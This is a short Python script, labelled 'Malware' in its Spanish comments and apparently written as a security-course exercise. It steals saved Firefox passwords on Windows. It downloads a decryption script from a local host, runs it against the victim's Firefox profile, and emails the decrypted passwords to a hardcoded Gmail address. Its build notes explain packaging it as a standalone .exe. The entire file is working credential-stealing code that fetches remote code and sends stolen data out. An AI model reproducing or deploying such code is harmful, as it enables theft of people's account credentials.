#!/usr/bin/env python3 # coding: cp850 """ Malware - firefox_decrypt.py Firefox Decrypt https://github.com/unode/firefox_decrypt La construcción del ejecutables es con pyinstaller y se ejecuta así: pyinstaller --oneline malware.py Para que funcione el .exe se debe harcodear el password y no usar dotenv """ import dotenv import os import requests import subprocess import sys import smtplib import tempfile from email.mime.text import MIMEText def run_command(command): """ Ejecutor de comandos """ try: output_command = subprocess.check_output(command, shell=True) return output_command.decode('cp850').strip() except Exception as e: print(f"\n[!] Error al ejecutar el comando {command}.\nError: {e}") return None def send_email(subject, body, sender, recipients, password): """ Envia un email con el reporte de teclas presionadas """ msg = MIMEText(body) msg['Subject'] = subject msg['From'] = sender msg['To'] = ', '.join(recipients) with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server: smtp_server.login(sender, password) smtp_server.sendmail(sender, recipients, msg.as_string()) print(f"[i] Email sent Successfully!\n") def get_firefox_profiles(username): path = f"C:\\Users\\" + username + "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" try: profiles = [profile for profile in os.listdir( path) if "release" in profile] return profiles[0] if profiles else None except Exception as e: print(f"\n[!] Error al obtener el profile de Firefox.\nError: {e}") return None def get_firefox_passwords(username, profiles): r = requests.get("http://192.168.1.120/firefox_decrypt.py") temp_dir = tempfile.mkdtemp() os.chdir(temp_dir) with open("firefox_decrypt.py", "wb") as f: f.write(r.content) command = f"python firefox_decrypt.py C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\{profiles}" passwords = run_command(command) os.remove("firefox_decrypt.py") return passwords if __name__ == '__main__': username_str = run_command("whoami") username = username_str.split("\\")[1] profiles = get_firefox_profiles(username) if not username or not profiles: sys.exit( f"\n[!] No ha sido posible obtener el nombre de usuario o el profile válido de firefox") passwords = get_firefox_passwords(username, profiles) if passwords: dotenv.load_dotenv() app_passwd = os.getenv("APP_PASSWD") send_email( "Decrypted Firefox Passwords INFO", passwords, "keyloggerseginf@gmail.com", ["keyloggerseginf@gmail.com"], app_passwd ) else: print(f"[!] No se han encontrado contraseñas")